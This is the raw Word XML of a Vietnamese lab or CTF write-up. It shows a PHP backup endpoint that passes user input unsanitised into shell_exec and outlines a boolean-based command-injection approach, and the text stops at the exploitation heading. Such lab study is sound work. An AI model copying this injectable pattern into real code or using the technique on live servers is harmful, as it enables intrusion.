          <w:p w14:paraId="4FEA878E" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:t xml:space="preserve"> 3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="735F43C3" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:t xml:space="preserve"> 4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28B78B06" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:t xml:space="preserve"> 5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="245D3056" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:t xml:space="preserve"> 6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26140DD7" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:t xml:space="preserve"> 7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28840547" w14:textId="77777777" w:rsidR="0098336C" w:rsidRPr="00D32F54" w:rsidRDefault="0098336C" w:rsidP="00D32F54"/>
          <w:p w14:paraId="6A63A63A" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:t xml:space="preserve"> 8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BECF6F6" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:t xml:space="preserve"> 9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CCAE076" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:t>10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E11BEF9" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:t>11</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79D82175" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:t>12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73887EE3" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:t>13</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5678AE32" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:t>14</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EBF8502" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:t>15</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="445E9D8E" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:t>16</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CCF25ED" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:t>17</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31EEF108" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:t>18</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36A1842B" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:t>19</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D582B4D" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:t>20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A822653" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:t>21</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E053A03" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:t>22</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="498F423B" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:t>23</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17ECB3AB" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:t>24</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EB55F9D" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:t>25</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F220897" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:t>26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17B05AC1" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>&lt;?php</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6396660B" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:t>(isset($_POST[</w:t>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'command'</w:t>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:t>],$_POST[</w:t>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'target'</w:t>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:t>])){</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BD59C39" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:t xml:space="preserve">        $command = $_POST[</w:t>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'command'</w:t>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:t>];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CD70395" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:t xml:space="preserve">        $target = $_POST[</w:t>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'target'</w:t>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:t>];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FB152E8" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>switch</w:t>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:t>($command) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20C657CA" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>case</w:t>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"backup"</w:t>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4057368B" w14:textId="77777777" w:rsidR="0098336C" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D32F54">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:tab/>
              <w:t>$result = shell_exec(</w:t>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"timeout 3 zip /tmp/</w:t>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>$target</w:t>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> -r </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74229B20" w14:textId="6AD67519" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>/var/www/html/index.php 2&gt;&amp;1"</w:t>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EA6040C" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:t xml:space="preserve">                </w:t>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:t xml:space="preserve"> ($result !== </w:t>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>null</w:t>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:t xml:space="preserve"> &amp;&amp; strpos($result, </w:t>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"zip error"</w:t>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:t xml:space="preserve">) === </w:t>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>false</w:t>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71F63013" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:t xml:space="preserve">                    </w:t>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>die</w:t>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"Backup thành công"</w:t>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C9F4284" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:t xml:space="preserve">                </w:t>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>else</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54C76DEF" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:t xml:space="preserve">                    </w:t>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>die</w:t>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"Backup không thành công"</w:t>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01D15B92" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>break</w:t>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57B2992C" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>// CHANGELOG: Bảo trì</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79AB2279" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>// case "ping":</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3556659B" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">// </w:t>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:tab/>
              <w:t>$result = shell_exec("timeout 10 ping -c 4 $target 2&gt;&amp;1");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E84C9A5" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">// </w:t>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:tab/>
              <w:t>break;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57388CB7" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>// case "nslookup":</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F7B3727" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">// </w:t>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:tab/>
              <w:t>$result = shell_exec("timeout 10 nslookup $target 2&gt;&amp;1");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24FF9183" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">// </w:t>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:tab/>
              <w:t>break;</w:t>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B7E06DC" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>// case "dig":</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CDA0F93" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">// </w:t>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:tab/>
              <w:t>$result = shell_exec("timeout 10 dig $target 2&gt;&amp;1");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44943260" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">// </w:t>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:tab/>
              <w:t>break;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="045D5AA8" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D32F54">
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C6B80FA" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54"/>
          <w:p w14:paraId="133FB52A" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E15C488" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>?&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="496FA2B5" w14:textId="77777777" w:rsidR="00E71537" w:rsidRDefault="00E71537"/>
    <w:p w14:paraId="248AFCFF" w14:textId="77777777" w:rsidR="0016097C" w:rsidRDefault="0016097C">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5FB808" w14:textId="2FA078E1" w:rsidR="00790E5A" w:rsidRDefault="000E64EB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Đoạn code này cũng y hệt các bài trước. Vì vậy có lẽ </w:t>
      </w:r>
      <w:r w:rsidR="00EA116F" w:rsidRPr="00EA116F">
        <w:t xml:space="preserve">khả năng cao sự khác biệt nằm ở cấu hình môi </w:t>
      </w:r>
      <w:r w:rsidR="00EA116F">
        <w:t xml:space="preserve">trường, </w:t>
      </w:r>
      <w:r w:rsidR="00EA116F" w:rsidRPr="00EA116F">
        <w:t>cụ thể là trong file docker-compose.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EF8B6A" w14:textId="7079C2AE" w:rsidR="00790E5A" w:rsidRDefault="00790E5A">
      <w:r w:rsidRPr="00790E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A2E89BF" wp14:editId="6F2AB5D7">
            <wp:extent cx="5731510" cy="2411095"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="16700016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01642" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId40"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2411095"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="758707AC" w14:textId="77777777" w:rsidR="00F166D1" w:rsidRPr="00F166D1" w:rsidRDefault="00F166D1" w:rsidP="00F166D1">
      <w:r w:rsidRPr="00F166D1">
        <w:t>Dựa trên nội dung file docker-compose.yml bạn đã cung cấp, có một chi tiết quan trọng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583E580E" w14:textId="2C60137B" w:rsidR="00F166D1" w:rsidRPr="00F166D1" w:rsidRDefault="00F166D1" w:rsidP="00F166D1">
      <w:r w:rsidRPr="00F166D1">
        <w:t xml:space="preserve">volumes: - ./cmd_level6/src/:/var/www/html/: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC4F39D" w14:textId="77777777" w:rsidR="00F166D1" w:rsidRPr="00F166D1" w:rsidRDefault="00F166D1" w:rsidP="00F166D1">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F166D1">
        <w:t>→ Tùy chọn :ro (read-only) đã được áp dụng cho thư mục /var/www/html/, nghĩa là container không thể ghi file vào thư mục web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F158FB3" w14:textId="77777777" w:rsidR="00DC5403" w:rsidRPr="008566A5" w:rsidRDefault="00DC5403" w:rsidP="00DC5403">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF619D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">* Ý tưởng </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1692869B" w14:textId="2E7F45AE" w:rsidR="00803CD7" w:rsidRDefault="00EC478D" w:rsidP="00EC478D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Sử dụng k</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC478D">
        <w:t xml:space="preserve">ỹ thuật Boolean-based Command Injection để xác định giá trị của các biểu thức logic thông qua phản hồi HTTP. Bằng cách quan sát sự thay đổi giữa thông báo “Backup thành công” và “Backup không thành công”, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">mình </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC478D">
        <w:t>có thể suy luận xem điều kiện kiểm tra có đúng hay không.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Và từ đó có thể tiến hành khai thác command injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14505A47" w14:textId="3119C6AD" w:rsidR="00EC478D" w:rsidRPr="00184ED1" w:rsidRDefault="00EC478D" w:rsidP="00EC478D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00184ED1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>* Khai thác</w:t>
      </w:r>
      <w:r w:rsidR="00B60C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
